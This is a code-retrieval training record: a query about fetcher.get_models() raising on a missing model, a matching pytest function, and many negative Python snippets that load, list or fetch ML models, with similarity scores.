[ "0.7327567", "0.69435924", "0.67743224", "0.67731684", "0.666128", "0.66390353", "0.6595562", "0.6590047", "0.64084816", "0.6316313", "0.6267025", "0.62651926", "0.626041", "0.6233475", "0.6200443", "0.61957514", "0.61935633", "0.61921066", "0.61672646", "0.61589247", "0.6154951", "0.6127301", "0.6122401", "0.6119595", "0.60895294", "0.6084304", "0.6076584", "0.60558337", "0.60204977", "0.60099065", "0.6000378", "0.59894866", "0.5973256", "0.59708786", "0.59646904", "0.5959054", "0.59453535", "0.5932688", "0.59304863", "0.5917831", "0.59142953", "0.5913386", "0.59090734", "0.5888891", "0.58860165", "0.58712643", "0.58348227", "0.5808802", "0.5807494", "0.5796432", "0.5787363", "0.5786724", "0.5774374", "0.5767773", "0.5763746", "0.5724312", "0.5718138", "0.57111436", "0.57084054", "0.5691953", "0.5680172", "0.5664144", "0.56401724", "0.56401724", "0.5574124", "0.5539155", "0.5536057", "0.5520777", "0.5517591", "0.550578", "0.5502662", "0.5495101", "0.5493489", "0.5487742", "0.54824877", "0.54764974", "0.54740924", "0.54740924", "0.54664975", "0.54634917", "0.5454626", "0.5453488", "0.54526365", "0.5449064", "0.5448379", "0.544452", "0.543344", "0.54320335", "0.5430745", "0.54078996", "0.5407478", "0.5388507", "0.5386578", "0.5386476", "0.5382068", "0.5374689", "0.5372811", "0.53641796", "0.5361513", "0.5361345" ]
0.75194955
0
fetcher.get_models() should throw if a model is not found.
def test_get_models_throws_if_project_does_not_exist( fc: fetcher.Fetcher, project, model ): with pytest.raises(exceptions.NotFoundError) as exc: fc.get_models(project=project, model=model) assert "An error occured while getting projects." in str(exc.value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_models_throws_if_model_does_not_exist(fc: fetcher.Fetcher, project, model):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting models.\" in str(exc.value)", "def test_get_models_returns_models(fc: fetcher.Fetcher):\n ml = fc.get_models()\n assert isinstance(ml, list)\n assert isinstance(ml[0], models.LookmlModel)", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def test_get_model_method_with_missing_model(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n exception_message = \"\"\n model = None\n try:\n model = model_manager.get_model(qualified_name=\"asdf\")\n except Exception as e:\n exception_raised = True\n exception_message = str(e)\n\n # assert\n self.assertTrue(exception_raised)\n self.assertTrue(exception_message == \"Instance of model 'asdf' not found in ModelManager.\")", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def get_models(self):\n self.load()\n return self._models", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def check_models():\n # Check if Models exist\n if request.method == 'GET':\n if models_exist():\n return jsonify({'message': 'models found'})\n else:\n return jsonify({'message': 'one or more models missing'}), 409\n\n # Post Method, download models\n else:\n task = download_models.apply_async()\n 
task_url = url_for('model_download_status', task_id=task.id)\n return jsonify({'message': 'download started', 'location': task_url}), 202, {'Location': task_url}", "def try_models(self):\n result = os.system(\"python try_models.py\")\n return result == 0", "def ez_get_models(auth_token, options = None):\n status_code = 500\n try:\n API_REQUEST_URL = API_URL + \"/ez_get_models\"\n payload = {\n \"options\": options\n }\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer \" + str(auth_token),\n }\n response = requests.request(\n \"POST\", API_REQUEST_URL, headers = headers, data = json.dumps(payload)\n )\n status_code = response.status_code\n try:\n response_json = response.json()\n except Exception as e:\n response.raise_for_status()\n response_json[\"status_code\"] = status_code\n return response_json\n except Exception as e:\n print((traceback.print_exc()))\n return exception_return(e, status_code)", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def test_coupledmodels_get(self):\n pass", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def get_models(make):\n api_url = 'https://api.edmunds.com/api/vehicle/v2/{}/models?fmt=json&api_key={}'\\\n .format(make, API_KEY)\n r = requests.get(api_url).json()\n all_models = [model['name'] for model in r['models']]\n return all_models", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"], 
path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def models() -> list[str]:\n return list(models_url.keys())", "def test_get_model(self) -> None:\n get_model()", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def get_best_models(self, num_models) -> Sequence[tf.keras.Model]:\n pass", "def test_get_model_metadata_method_with_missing_model(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n excpeption_raised = False\n exception_message = None\n try:\n model_metadata = model_manager.get_model_metadata(qualified_name=\"asdf\")\n except Exception as e:\n excpeption_raised = True\n exception_message = str(e)\n\n # assert\n self.assertTrue(excpeption_raised)\n self.assertTrue(exception_message == \"Instance of model 'asdf' not found in ModelManager.\")", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def get_model(model):\n all_models = cmd.get_object_list()\n\n if len(all_models) == 0:\n logging.parser_error('No models are opened.')\n return\n\n model = model.lower()\n\n if model and (model in all_models):\n return model\n\n if len(all_models) > 1:\n logging.parser_error(\"Please specify which model you want to use. 
{}\".format(all_models))\n return\n\n return all_models[0]", "def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def get_all_models() -> list:\n\n conn = database_connect()\n if(conn is None):\n return None\n cur = conn.cursor()\n\n try:\n # SQL statement and execute\n sql = \"\"\"SELECT manufacturer, description, modelnumber, weight\n FROM Model\"\"\"\n cur.execute(sql, ())\n\n # Attempt to fetch first row\n result = cur.fetchall()\n\n if result == None:\n cur.close()\n conn.close()\n return []\n\n models = []\n for row in result:\n models.append(\n [row[0], row[1], row[2], row[3]]\n )\n\n cur.close()\n conn.close()\n return models\n except Exception as e:\n print(\"fff\")\n print(e)\n # If login failed, return None\n cur.close()\n conn.close()\n return []", "def test_get_model_method(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n model = None\n try:\n model = model_manager.get_model(qualified_name=\"qualified_name\")\n except Exception as e:\n exception_raised = True\n\n # assert\n self.assertFalse(exception_raised)\n self.assertTrue(type(model) is MLModelMock)", "def load_models(appname):\n return import_module('.models', appname)", "def simple_models(self, uuid=None):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n\n if uuid is None:\n r = requests.get(self.url + '/model', headers=headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)\n else:\n r = requests.get(self.url + '/model/' + uuid, headers=headers)\n if r.status_code == 200:\n return self.build_simple_model(json.loads(r.content))\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return models", "def download_all_models() -> None:\n model_keys = ModelInfo.get_all_models()\n for model_key in model_keys:\n download_model(model_key)", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def fetch_ml_model_info() -> ApiResponse:\n return _api_response(settings.ML_MODELS)", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def _get_embedded_models(self,\n model,\n instance,\n success,\n model_names):\n\n callback = partial(self._handle_embedded_models,\n model=model,\n instance=instance,\n success=success)\n self.get_models(model_names=model_names,\n callback=callback)", "def test_model_get(self):\n response = self.client().get('/model')\n self.assertEqual(response.status_code, 200)\n loaded_model = Model.from_json(response.data.decode())\n self.assertEqual(loaded_model, self.data_manipulation.get_latest_model())\n\n # All versions are removed\n self.data_manipulation.versions = {}\n\n other_response = self.client().get('/model')\n self.assertEqual(other_response.status_code, 404)", "def get(self, request):\n 
MODEL_NOT_FOUND = -1\n model_ids = self.request.query_params.get(\"ids\", False)\n if not model_ids:\n return HttpResponse(status=400)\n else:\n model_ids = model_ids.split(\",\")\n results = []\n for model_id in model_ids:\n try:\n model = models.ModelRun.objects.get(id=model_id)\n results.append(\n {\"name\": model.name, \"id\": int(model_id), \"status\": model.status}\n if model.is_base or model.public or model.user == self.request.user\n else {\n \"name\": model.name,\n \"id\": int(model_id),\n \"status\": MODEL_NOT_FOUND,\n }\n )\n except models.ModelRun.DoesNotExist:\n results.append({\"id\": int(model_id), \"status\": MODEL_NOT_FOUND})\n\n return Response({\"results\": results})", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def _pc_load_models(model_name = None, mod_list = None, n_sample = None, verbose = False, **kwargs):\n\n if model_name is not None:\n mod_list = glob.glob(model_name + '*.out')\n if mod_list is None or mod_list == []:\n pc.log_.error('No model found', calling='load models')\n return None\n if n_sample is not None:\n if n_sample > len(mod_list):\n pc.log_.error('less models {0:d} than n_sample {1:d}'.format(len(mod_list), n_sample),\n calling='load models')\n return None\n mod_list = random.sample(mod_list, n_sample)\n m = []\n for outfile in mod_list:\n if outfile[-4::] == '.out':\n model_name = outfile[0:-4]\n else:\n model_name = outfile\n try:\n cm = pc.CloudyModel(model_name, verbose=0, **kwargs)\n if not cm.aborted:\n m.append(cm)\n if verbose:\n print('{0} model read'.format(outfile[0:-4]))\n except:\n pass\n pc.log_.message('{0} models read'.format(len(m)), calling='load_models')\n return m", "def getModels(makeURL):\n\n #Get make page as Soup\n soup, _ = getPage(makeURL)\n\n #Check if page available\n if soup is None:\n #Not available - break\n print(\"Can't find Make URL\")\n quit()\n\n #Try to find models list\n try:\n #Find span with text \"Make\"\n span = soup.find(class_=\"srp-filter-group__filter-name\", text=\"Make\")\n #Move up two parents\n a = span.parent.parent\n #Find all filter names\n b = a.find_all(class_=\"srp-list-filter__item-link link link--no-underline\")\n models = [i['href'] for i in b]\n models = models[1:]\n except:\n print(makeURL)\n models=[]\n \n logger.debug(f\"Models include: {models}\")\n return models", "def get_models_for_make_id(self, make_id):\n return self.get('vehicles/GetModelsForMakeId/{}'.format(make_id))", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_model(self, app_label, model_name,\n seed_cache=True, only_installed=True):\n if seed_cache:\n self._populate()\n if only_installed and app_label not 
in self.app_labels:\n return None\n return self.app_models \\\n .get(app_label, SortedDict()) \\\n .get(model_name.lower())", "def test_get_models_by_make(self):\n request = self.factory.get('/api/v1/cars', {'make': 'BMW',\n 'distance': 100000})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n self.assertNotEqual(response.data['models'], [])\n self.assertIs(type(response.data['models'][0]['model']), str)\n self.assertIs(type(response.data['models'][0]['count']), int)", "def availablemodels(self):\n return self.__models.keys()", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "async def list_models(\n list_models_request: ListModels,\n token: str = Depends(oauth2_scheme),\n):\n try:\n logging.info(\"Calling /gcp/automl/list_models endpoint\")\n logging.debug(f\"Request: {list_models_request}\")\n if decodeJWT(token=token):\n response = ManageModelController().list_model_controller(\n request=list_models_request\n )\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid access token\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n except Exception as error:\n logging.error(f\"Error in /gcp/automl/list_models endpoint: {error}\")\n raise error", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def get_installed_models():\n global _installed_models_cache\n if _installed_models_cache is not None:\n return _installed_models_cache\n _installed_models_cache = []\n for a in settings.INSTALLED_APPS:\n try:\n _installed_models_cache.append(__import__(a + '.models', '', '', ['']))\n except ImportError:\n pass\n return _installed_models_cache", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_model(source: str, 
supported_model_name: str, model_id: str):\n connector = __get_connector(source)\n supported_model = __get_supported_model(supported_model_name)\n\n try:\n model = connector.get(supported_model, model_id)\n return __parse_response(source, model)\n except Exception as e:\n abort(500, e)", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def get_supported_models(self):\n # type: () -> list\n return [model for model in self.__MODELS]", "def test_list_models():\n model_names = find_model_files()\n listed_model_names = list_available_nagl_models()\n assert listed_model_names == model_names", "def list_models():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_models\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)", "def get_models_from_table_names(table_names, force=None):\n models = []\n errors = []\n for table_name in table_names:\n try:\n models.append(\n get_model_from_table_name(table_name)\n )\n except (\n IncorrectTableNameException,\n ModelDoesNotExistException\n ) as exc:\n if not force:\n raise exc\n errors.append(exc.args)\n return models, errors", "def load_models_by_type(model_type):\n\n # loading the models for each language supported\n return [(lang_id, load_model(lang_id, model_type)) for lang_id in language_id_to_code_mapper]", "def load_best_model_json():\n with open(qualify_full_filepath(f\"models.json\", HERE), \"r\") as infile:\n models = json.load(infile)\n return models", "def _get_models_from_metafile(dir: str):\n meta_indexes = load(osp.join(dir, 'model-index.yml'))\n for meta_path in meta_indexes['Import']:\n # meta_path example: mmcls/.mim/configs/conformer/metafile.yml\n meta_path = osp.join(dir, meta_path)\n metainfo = load(meta_path)\n yield from metainfo['Models']", "def find_models(page_index=0):\n search_query = {\n 'query': {\n 'match_all': {}\n }\n }\n\n results = find_items('model', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for model in results['hits']['hits']:\n records.append({\n 'name': model['_id'],\n 'date_created': model['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def list_models(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['search_pattern']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Get the list of models based on the search pattern\n search_pattern = self.request_df.loc[0, 
'search_pattern']\n \n # If the search pattern is empty default to all models\n if not search_pattern.strip():\n search_pattern = '*'\n \n # Get the list of models as a string\n models = \"\\n\".join([str(p).split(\"\\\\\")[-1] for p in list(pathlib.Path(self.path).glob(search_pattern))])\n \n # Prepare the output\n self.response = pd.Series(models)\n \n # Finally send the response\n return self.response", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def iter_models(self):\n return iter(self.model_list)", "def get_model(params):\r\n module_name, class_name = params.model.name.rsplit('.', 1)\r\n i = importlib.import_module(module_name)\r\n return getattr(i, class_name)", "def load_models(model_base_name=None, num_voices=4):\n models = []\n for voice_index in range(num_voices):\n model_path_name = os.path.join(PACKAGE_DIR,\n 'models/' + model_base_name+ '_' + str(\n voice_index))\n model = load_model(model_path_name)\n model.compile(optimizer='adam',\n loss={'pitch_prediction': 'categorical_crossentropy'\n },\n metrics=['accuracy'])\n models.append(model)\n return models", "def list_models(\n architecture: Optional[str] = typer.Option(None, '-n', '--name', help='Model architecture name'),\n framework: Optional[Framework] = typer.Option(None, '-fw', '--framework', case_sensitive=False,\n help='Framework'),\n engine: Optional[Engine] = typer.Option(None, '-e', '--engine', case_sensitive=False, help='Serving engine'),\n version: Optional[int] = typer.Option(None, '-v', '--version', help='Version'),\n list_all: Optional[bool] = typer.Option(\n False,\n '-a', '--all', is_flag=True,\n help='Display queried models. 
otherwise, only partial result will be shown.'\n ),\n):\n\n payload = remove_dict_null(\n {'architecture': architecture, 'framework': framework, 'engine': engine, 'version': version}\n )\n with requests.get(f'{app_settings.api_v1_prefix}/model', params=payload) as r:\n model_list = r.json()\n model_view([MLModel.parse_obj(model) for model in model_list], list_all=list_all)", "def test_downloadAllModels(self):\n\t\tmodelOptions = cancerscope.config.getmodelsdict() ## MODIFIED FROM cancerscope.getmodelsdict() on March 17 2020\n\t\tassert len(modelOptions.keys()) == 5\n\t\tscope_ensemble_obj = cancerscope.scope_ensemble.scope() ## MODIFIED FROM cancerscope.scope() on March 17 2020\n\t\t#my_downloaded_models = cancerscope.get_models.getmodel() ## This should retrieve all models\n\t\tmy_downloaded_models = scope_ensemble_obj.downloaded_models_dict\n\t\tassert len(my_downloaded_models.keys()) == 5\n\t\tfor k_model in my_downloaded_models.keys():\n\t\t\tmodelname_address = my_downloaded_models[k_model]\n\t\t\t\"\"\"For each model, test if model dir exists, then set up the model once\"\"\"\n\t\t\tself.assertTrue(os.path.isdir(modelname_address))\n\t\t\tself.assertTrue(os.path.exists(\"\".join([modelname_address, \"/lasagne_bestparams.npz\"])))\n\t\t\t\"\"\"TO BE FIXED: THEN SET UP MODEL (memory issues in travis (3 GB RAM there)\"\"\"\n\t\t\t#lmodel = cancerscope.scopemodel(modelname_address_pair[k_model])\n\t\t\t#lmodel.fit()\n\t\t\t#self.assertEqual(len(lmodel.features), 17688)\n\t\t\t#del lmodel; lmodel=None\n\t\t\t#for i in range(3):\n\t\t\t#\tgc.collect()", "def _load_predictiveModel(self):\n # type: () -> None\n\n for model in self.__MODELS:\n if isinstance(self._model, model):\n self._classLabels = self._model.classes_ # Assign the classes available in the classifier to the labels container.\n return\n\n raise InvalidModelException(\n \"Did not recieve a model that was one of the expected types. Use model_types() to see supported models. 
Recieved type {0}\".format(\n type(self._model)))", "def check_models_ready(self):\n if not self.models_ready:\n raise RuntimeError(\"Models aren't loaded yet.\")", "def load_model(seriesname):\n LOG.debug(\"Calling load_model() with the following arguments:\")\n LOG.debug(\"seriesname = %s\"%seriesname)\n \n result = []\n return result", "def _request_model(self, instance, success, get_embedded=True):\n coll = self.get_collection('_model')\n if get_embedded:\n callback = partial(self._get_embedded_model_names,\n instance=instance,\n success=success)\n else:\n callback = success\n\n try:\n instance['_model']\n except KeyError:\n raise tornado.web.HTTPError(400, 'Missing model key')\n coll.find_one({'_id': instance['_model']},\n callback=callback)", "def test_model_runs(self):\n\n for m in self.models:\n self.assertTrue(m is not None)\n self.assertTrue(isinstance(m, topic_model.TopicModel))", "def list_supported_models() -> Sequence[str]:\r\n return list(_MODELS)", "def get_models():\n all_models = gfile.Glob(os.path.join(MODELS_DIR, '*.meta'))\n model_filenames = [os.path.basename(m) for m in all_models]\n model_numbers_names = sorted([\n (shipname.detect_model_num(m), shipname.detect_model_name(m))\n for m in model_filenames])\n return model_numbers_names", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models", "def test_load_model_method(self):\n # arrange\n # instantiating the model manager class\n model_manager = ModelManager()\n\n # adding the model\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n model_object = None\n # accessing the MLModelMock model object\n try:\n model_object = model_manager.get_model(qualified_name=\"qualified_name\")\n except Exception as e:\n exception_raised = True\n print_tb(e)\n\n # assert\n self.assertFalse(exception_raised)\n self.assertTrue(model_object is not None)", "def init_models(self):\n from ron import Application\n from ron.models.basemodel import BaseModel\n if self.models == None or not Application().db:\n return\n models_namespace = self.__namespace + \".models\" # TODO: allow customize this\n try:\n models_package = import_module(models_namespace)\n except:\n models_package = None\n if models_package:\n models_modules = self._get_package_modules(models_package)\n for model_name in models_modules:\n imported_model = import_module('.' 
+ model_name, package=models_namespace)\n for i in dir(imported_model):\n attribute = getattr(imported_model, i)\n if inspect.isclass(attribute) and issubclass(attribute, BaseModel):\n self.models.append(attribute)\n Application().db().database.create_tables(self.models)", "def models(self):\n return self.config.models()", "def load_models(model_dirs):\n models = []\n for directory in model_dirs:\n filenames = os.listdir(directory)\n for filename in filenames:\n if filename.endswith('.pth'):\n model_path = os.path.join(directory, filename)\n model = get_model()\n target_device = None if torch.cuda.is_available() else 'cpu'\n model.load_state_dict(torch.load(model_path, map_location=target_device))\n models.append(model)\n return models", "def get_model(self, id):\n if id not in self._models:\n raise Exception(f'model with the id {id} does not exist')\n return self._models[id]", "def check_models(*, schemas: _oa_types.Schemas) -> types.TModels:\n not_constructables = iterate.not_constructable(schemas=schemas)\n not_constructables_result = map(\n lambda args: (args[0], check_model(schemas, args[1])), not_constructables\n )\n return dict(not_constructables_result)", "def GetModel(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models" ]
